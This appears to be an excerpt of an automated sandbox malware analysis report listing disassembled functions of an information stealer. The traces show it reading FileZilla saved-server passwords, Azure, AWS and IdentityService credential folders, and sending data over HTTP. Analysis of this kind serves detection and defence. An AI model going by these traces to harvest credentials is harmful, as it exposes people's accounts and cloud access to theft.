                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 123533781-0
                                                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                                                  Function 00B1D1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                  • Instruction ID: a4127c69f0ed00ed12e14b53f80e32f4a83f120d49244834c8a2f7babfbe096b
                                                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                  • Instruction Fuzzy Hash: 2A71C231452F40DBD7633B31ED03EC976EA7F04702F9049B4B1D729D729A2278E99A52
                                                                                  Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • strtok_s.MSVCRT ref: 0041031B
                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                                                  • strtok_s.MSVCRT ref: 00410679
                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                                                  • memset.MSVCRT ref: 004106DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                  • API String ID: 337689325-514892060
                                                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                                                  Function 00B04827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00424DA0), ref: 00B04833
                                                                                  • lstrlen.KERNEL32(00424E50), ref: 00B0483E
                                                                                  • lstrlen.KERNEL32(00424F18), ref: 00B04849
                                                                                  • lstrlen.KERNEL32(00424FD0), ref: 00B04854
                                                                                  • lstrlen.KERNEL32(00425078), ref: 00B0485F
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B0486E
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B04875
                                                                                  • lstrlen.KERNEL32(00425120), ref: 00B04883
                                                                                  • lstrlen.KERNEL32(004251C8), ref: 00B0488E
                                                                                  • lstrlen.KERNEL32(00425270), ref: 00B04899
                                                                                  • lstrlen.KERNEL32(00425318), ref: 00B048A4
                                                                                  • lstrlen.KERNEL32(004253C0), ref: 00B048AF
                                                                                  • lstrlen.KERNEL32(00425468), ref: 00B048C3
                                                                                  • lstrlen.KERNEL32(00425510), ref: 00B048CE
                                                                                  • lstrlen.KERNEL32(004255B8), ref: 00B048D9
                                                                                  • lstrlen.KERNEL32(00425660), ref: 00B048E4
                                                                                  • lstrlen.KERNEL32(00425708), ref: 00B048EF
                                                                                  • lstrlen.KERNEL32(004257B0), ref: 00B04918
                                                                                  • lstrlen.KERNEL32(00425858), ref: 00B04923
                                                                                  • lstrlen.KERNEL32(00425920), ref: 00B0492E
                                                                                  • lstrlen.KERNEL32(004259C8), ref: 00B04939
                                                                                  • lstrlen.KERNEL32(00425A70), ref: 00B04944
                                                                                  • strlen.MSVCRT ref: 00B04957
                                                                                  • lstrlen.KERNEL32(00425B18), ref: 00B0497F
                                                                                  • lstrlen.KERNEL32(00425BC0), ref: 00B0498A
                                                                                  • lstrlen.KERNEL32(00425C68), ref: 00B04995
                                                                                  • lstrlen.KERNEL32(00425D10), ref: 00B049A0
                                                                                  • lstrlen.KERNEL32(00425DB8), ref: 00B049AB
                                                                                  • lstrlen.KERNEL32(00425E60), ref: 00B049BB
                                                                                  • lstrlen.KERNEL32(00425F08), ref: 00B049C6
                                                                                  • lstrlen.KERNEL32(00425FB0), ref: 00B049D1
                                                                                  • lstrlen.KERNEL32(00426058), ref: 00B049DC
                                                                                  • lstrlen.KERNEL32(00426100), ref: 00B049E7
                                                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B04A03
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2127927946-0
                                                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction ID: 8b37b63ff49b49d9d5f8ec3e3e1b310d2fe4f1cd4e778ee156584a5248b65180
                                                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction Fuzzy Hash: 0141A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                                                  Function 00B19AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B19B08
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B19B21
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B19B39
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B19B51
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B19B6A
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B19B82
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B19B9A
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B19BB3
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B19BCB
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B19BE3
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B19BFC
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B19C14
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B19C2C
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B19C45
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B19C5D
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B19C75
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B19C8E
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B19CA6
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B19CBE
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B19CD7
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B19CEF
                                                                                  • LoadLibraryA.KERNEL32(0064A550,?,00B16C67), ref: 00B19D01
                                                                                  • LoadLibraryA.KERNEL32(0064A17C,?,00B16C67), ref: 00B19D12
                                                                                  • LoadLibraryA.KERNEL32(0064A104,?,00B16C67), ref: 00B19D24
                                                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,00B16C67), ref: 00B19D36
                                                                                  • LoadLibraryA.KERNEL32(0064A328,?,00B16C67), ref: 00B19D47
                                                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B19D69
                                                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B19D8A
                                                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B19DA2
                                                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B19DC4
                                                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B19DE5
                                                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B19E06
                                                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B19E1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 2238633743-0
                                                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction ID: b199df666dbd456ab216db926ebf29c6312d735fcf385c622c8561936ca560d0
                                                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction Fuzzy Hash: 52A13CBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                                                  Function 00B104B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                    • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                    • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                    • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                    • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                    • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • strtok_s.MSVCRT ref: 00B10582
                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B105C9
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B105D0
                                                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 00B105EC
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B105FA
                                                                                    • Part of subcall function 00B18B47: malloc.MSVCRT ref: 00B18B4F
                                                                                    • Part of subcall function 00B18B47: strncpy.MSVCRT ref: 00B18B6A
                                                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 00B10636
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10644
                                                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 00B10680
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B1068E
                                                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 00B106CA
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B106DC
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10769
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10781
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10799
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B107B1
                                                                                  • lstrcat.KERNEL32(?,0042164C), ref: 00B107C9
                                                                                  • lstrcat.KERNEL32(?,00421660), ref: 00B107D8
                                                                                  • lstrcat.KERNEL32(?,00421670), ref: 00B107E7
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B107FA
                                                                                  • lstrcat.KERNEL32(?,00421678), ref: 00B10809
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1081C
                                                                                  • lstrcat.KERNEL32(?,0042167C), ref: 00B1082B
                                                                                  • lstrcat.KERNEL32(?,00421680), ref: 00B1083A
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1084D
                                                                                  • lstrcat.KERNEL32(?,00421688), ref: 00B1085C
                                                                                  • lstrcat.KERNEL32(?,0042168C), ref: 00B1086B
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1087E
                                                                                  • lstrcat.KERNEL32(?,00421698), ref: 00B1088D
                                                                                  • lstrcat.KERNEL32(?,0042169C), ref: 00B1089C
                                                                                  • strtok_s.MSVCRT ref: 00B108E0
                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B108F5
                                                                                  • memset.MSVCRT ref: 00B10944
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3689735781-0
                                                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                  • Instruction ID: 114f8bab587d5397674af8e3d9c1b89f550941d0c5bc5891cec98cf587fb77b3
                                                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                  • Instruction Fuzzy Hash: 98D17275A11208ABCB04FBF0DD96EEE77B9FF14300F904499F102B6091EE74AA85CB61
                                                                                  Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00405A13
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0090B890,00000000,?,008D4EE0,00000000,?,00421A1C), ref: 00405E71
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                                                  • HttpOpenRequestA.WININET(00000000,0090B870,?,0090B380,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                  • String ID: "$"$------$------$------
                                                                                  • API String ID: 1406981993-2180234286
                                                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                                                  Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00414D87
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  • memset.MSVCRT ref: 00414E13
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  • memset.MSVCRT ref: 00414E9F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00906250,?,000003E8), ref: 00414A4A
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                  • memset.MSVCRT ref: 00414F2B
